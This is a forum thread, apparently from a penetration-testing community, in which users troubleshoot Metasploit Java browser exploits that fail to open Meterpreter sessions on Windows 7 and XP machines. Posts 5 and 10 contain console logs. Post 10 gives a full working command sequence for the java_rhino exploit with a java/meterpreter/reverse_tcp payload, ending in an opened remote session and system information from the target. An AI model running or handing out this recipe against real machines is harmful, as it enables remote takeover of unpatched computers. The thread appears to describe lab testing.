Page 1 of 2 12 LastLast
Results 1 to 10 of 11

Thread: Meterpreter doesn't create its session

  1. #1
    Just burned their ISO
    Join Date
    Feb 2013
    Posts
    1

    Question Meterpreter doesn't create its session

    Hello guys,
    I am working on some of the new java exploits in the wild. However, everything goes fine, unless creating the meterpreter session.
    for instance, I used java rhino exploit and after starting the server and launching the vulnerable website, all I've got is as follows:[*] 10.1.41.3 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request[*] 10.1.41.3 java_rhino - Sending Applet.jar

    In a similar situation, I've started to use java_jre17_jmxbean exploit. Although it started the server and launched the exploit, it still doesn't create the meterpreter session.

    Just for the records, I've set the LPORT and LHOST to the attacker's port and attacker's IP address, respectively. So, everything is okay, unless the meterpreter session!

    My victims run both Win7 and Win XP SP3.

  2. #2
    Just burned their ISO
    Join Date
    Jan 2012
    Posts
    13

    Default Re: Meterpreter doesn't create its session

    Are you sure java is installed on the victims?

  3. #3
    Just burned their ISO
    Join Date
    Feb 2013
    Posts
    4

    Default Re: Meterpreter doesn't create its session

    I am also facing this Problem. In my case java is installed in victim's machine

  4. #4
    Junior Member
    Join Date
    Aug 2011
    Posts
    34

    Default Re: Meterpreter doesn't create its session

    Are you sure they're running vulnerable java versions????? Any antivirus or firewall installed????

  5. #5
    Just burned their ISO
    Join Date
    Feb 2013
    Posts
    4

    Default Re: Meterpreter doesn't create its session

    The firewall of the victim's machine is off and still it's not working it like this

    Code:
    [*] Started reverse handler on 192.168.1.30:4444 
    msf  exploit(java_rhino) > [*] Using URL: http://192.168.1.30:8080/Ve2lFLP[*] Server started.[*] 192.168.1.9      java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request[*] 192.168.1.9      java_rhino - Sending Applet.jar[*] 192.168.1.9      java_rhino - Sending Applet.jar[*] 192.168.1.9      java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request[*] 192.168.1.9      java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request[*] 192.168.1.9      java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request[*] 192.168.1.9      java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request
    but not creating a session.

  6. #6
    Junior Member
    Join Date
    Aug 2011
    Posts
    34

    Default Re: Meterpreter doesn't create its session

    Yah and i still think you're not using a vulnerable java version or an antivirus
    I only asked about the firewall because in a quite specific situation it could be blocking it and the other two are pretty obvious

  7. #7
    Just burned their ISO
    Join Date
    Feb 2013
    Posts
    4

    Default Re: Meterpreter doesn't create its session

    I m not using the antivirus on victim's machine and I don't know where I found the vanurable version of java.

  8. #8
    Junior Member
    Join Date
    Aug 2011
    Posts
    34

    Default Re: Meterpreter doesn't create its session

    Well if there are no AV's/firewalls then im pretty sure you're not using a vulnerable version.
    Just check what version(s) are affected by the exploit you are trying to use and search for it in the internet, here you can find some old versions http://www.oldapps.com/java.php

  9. #9
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: Meterpreter doesn't create its session

    hi
    I did a test in this way ...... but I do not know if it is the correct way!

    http://vimeo.com/60669213

  10. #10
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: Meterpreter doesn't create its session

    Quote Originally Posted by zimmaro View Post
    hi
    I did a test in this way ...... but I do not know if it is the correct way!

    http://vimeo.com/60669213
    ri-hi
    i made a same test with java/meterpreter/reverse_tcp && worked

    msf > use exploit/multi/browser/java_rhino
    msf exploit(java_rhino) > set srvhost 192.168.1.7
    srvhost => 192.168.1.7
    msf exploit(java_rhino) > set srvport 80
    srvport => 80
    msf exploit(java_rhino) > set uripath /
    uripath => /
    msf exploit(java_rhino) > set payload java/meterpreter/reverse_tcp
    payload => java/meterpreter/reverse_tcp
    msf exploit(java_rhino) > set lhost 192.168.1.7
    lhost => 192.168.1.7
    msf exploit(java_rhino) > set lport 443
    lport => 443
    msf exploit(java_rhino) > exploit[*] Exploit running as background job.
    [*] Started reverse handler on 192.168.1.7:443 [*] Using URL: http://192.168.1.7:80/[*] Server started.
    msf exploit(java_rhino) >[*] 192.168.1.10 java_rhino - Java Applet Rhino Script Engine Remote Code Execution handling request[*] 192.168.1.10 java_rhino - Sending Applet.jar[*] 192.168.1.10 java_rhino - Sending Applet.jar[*] Sending stage (30216 bytes) to 192.168.1.10[*] Meterpreter session 1 opened (192.168.1.7:443 -> 192.168.1.10:1053) at 2013-02-28 20:53:40 +0100
    sessions -i 1[*] Starting interaction with 1...

    meterpreter > sysinfo
    Computer : vict-4fa5381d76
    OS : Windows XP 5.1 (x86)
    Meterpreter : java/java

Page 1 of 2 12 LastLast

Similar Threads

  1. Reverse a meterpreter session
    By hongman in forum BackTrack 5 General Topics
    Replies: 3
    Last Post: 05-08-2012, 03:01 PM
  2. Spawning Meterpreter Session from a Meterpreter Session
    By CoolKiwi in forum Beginners Forum
    Replies: 6
    Last Post: 06-24-2010, 11:32 PM
  3. ReRouting Meterpreter session
    By Cryptid in forum OLD Pentesting
    Replies: 1
    Last Post: 10-02-2009, 10:13 AM
  4. Meterpreter session
    By serpens in forum OLD Newbie Area
    Replies: 4
    Last Post: 07-21-2009, 07:07 AM
  5. Replies: 1
    Last Post: 04-19-2009, 03:41 AM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •